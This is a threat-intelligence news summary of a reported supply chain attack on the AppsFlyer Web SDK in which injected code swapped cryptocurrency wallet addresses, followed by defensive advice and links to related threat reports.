CP
cyberpings
Threat IntelHIGH

AppsFlyer SDK - Supply Chain Attack Exposed Cryptocurrency Users

SCSC Media
AppsFlyersupply chain attackcryptocurrencymalicious codeProfero
🎯

Basically, bad guys hacked a tool used by apps to steal cryptocurrency.

Quick Summary

A supply chain attack compromised the AppsFlyer SDK, diverting cryptocurrency funds from thousands of applications. Users are at risk of losing money. Organizations must act quickly to secure their systems.

What Happened

On March 10, 2026, a serious supply chain attack compromised the AppsFlyer Web SDK, which is widely used for marketing analytics. Malicious code was inserted into the SDK, allowing attackers to intercept and replace cryptocurrency wallet addresses entered by users on various websites. This diverted funds from legitimate users to addresses controlled by the attackers. The attack was discovered by Profero researchers, who noted that over 15,000 businesses rely on the AppsFlyer SDK.

The malicious code was served from the official AppsFlyer domain, making it difficult for users to detect. It maintained the normal functions of the SDK while secretly monitoring network requests for wallet addresses. This attack targeted several cryptocurrencies, including Bitcoin, Ethereum, Solana, Ripple, and TRON, significantly impacting the cryptocurrency community.

Who's Affected

The attack affects thousands of applications that utilize the AppsFlyer Web SDK. As users unknowingly entered their cryptocurrency wallet addresses, they became vulnerable to losing funds. The scale of this incident means that both businesses and end-users are at risk. Organizations that depend on AppsFlyer for marketing analytics need to act quickly to mitigate potential losses.

AppsFlyer confirmed that the issue stemmed from a domain registrar incident, which allowed unauthorized code to be injected into the SDK. Fortunately, the mobile SDK was not affected, but the implications for the web version are significant.

What Data Was Exposed

The primary data exposed in this attack includes cryptocurrency wallet addresses. By replacing legitimate addresses with those of the attackers, the malicious code effectively redirected funds from unsuspecting users. This type of data exposure not only results in financial loss but also undermines trust in the applications that utilize the compromised SDK.

Organizations using the AppsFlyer Web SDK should be particularly vigilant, as the attack's impact could lead to further exploitation if not addressed promptly. Users' funds could be at risk until the issue is fully resolved.

What You Should Do

Organizations that utilize the AppsFlyer Web SDK should take immediate action. First, review telemetry logs for any suspicious activity that may indicate a compromise. It is also advisable to consider downgrading to known-good versions of the SDK until further assessments can be made.

Additionally, businesses should communicate with their users about the potential risks and encourage them to monitor their transactions closely. Implementing enhanced security measures, such as multi-factor authentication for cryptocurrency transactions, can also help mitigate risks in the future. This incident serves as a critical reminder of the vulnerabilities inherent in supply chain security and the importance of vigilance in protecting sensitive data.

🔒 Pro insight: This incident underscores the need for robust supply chain security practices to prevent similar attacks targeting critical infrastructure.

Original article from

SC Media

Read Full Article

Share

Related Pings

HIGHThreat Intel

Storm-2561 Campaign - Fake VPN Clients Used for Theft

Microsoft has reported a new campaign by Storm-2561, using fake VPN clients to steal user credentials. This targets those seeking legitimate software, posing a significant risk. Awareness and caution are key to avoiding these threats.

SC Media·
HIGHThreat Intel

Boggy Serpens - Evolving Cyberespionage Tactics Revealed

Iranian threat group Boggy Serpens is evolving its cyberespionage tactics with AI-enhanced malware and refined social engineering. Their persistent targeting of critical infrastructure raises significant risks. Organizations must enhance their defenses to combat these sophisticated threats.

Palo Alto Unit 42·
HIGHThreat Intel

Threat Intel - Russia-linked APT Uses DRILLAPP Backdoor

A new cyber espionage campaign targets Ukrainian organizations using the DRILLAPP backdoor. Linked to the Laundry Bear APT group, this operation employs stealthy techniques to evade detection. The ongoing threat raises significant security concerns for affected entities.

Security Affairs·
HIGHThreat Intel

Threat Intel - Cybercrime Frequent Flyers Revealed

Cybercrime is on the rise with hackers targeting militaries and businesses. A massive breach at Telus raises alarms about data security. Stay informed to protect your assets.

CyberWire Daily·
HIGHThreat Intel

Stryker Cyberattack - Tens of Thousands of Devices Wiped

A recent cyberattack on Stryker wiped tens of thousands of devices without using malware. The attack, linked to the Handala group, raises serious security concerns. Stryker is working to restore services and ensure product safety.

BleepingComputer·
HIGHThreat Intel

Iranian Cyber Threats - Evolution to Identity Weaponization

Iranian cyber operations have evolved from using wiper malware to exploiting legitimate tools for identity weaponization. This shift poses serious risks to organizations globally. Understanding these tactics is crucial for enhancing cybersecurity defenses.

Palo Alto Unit 42·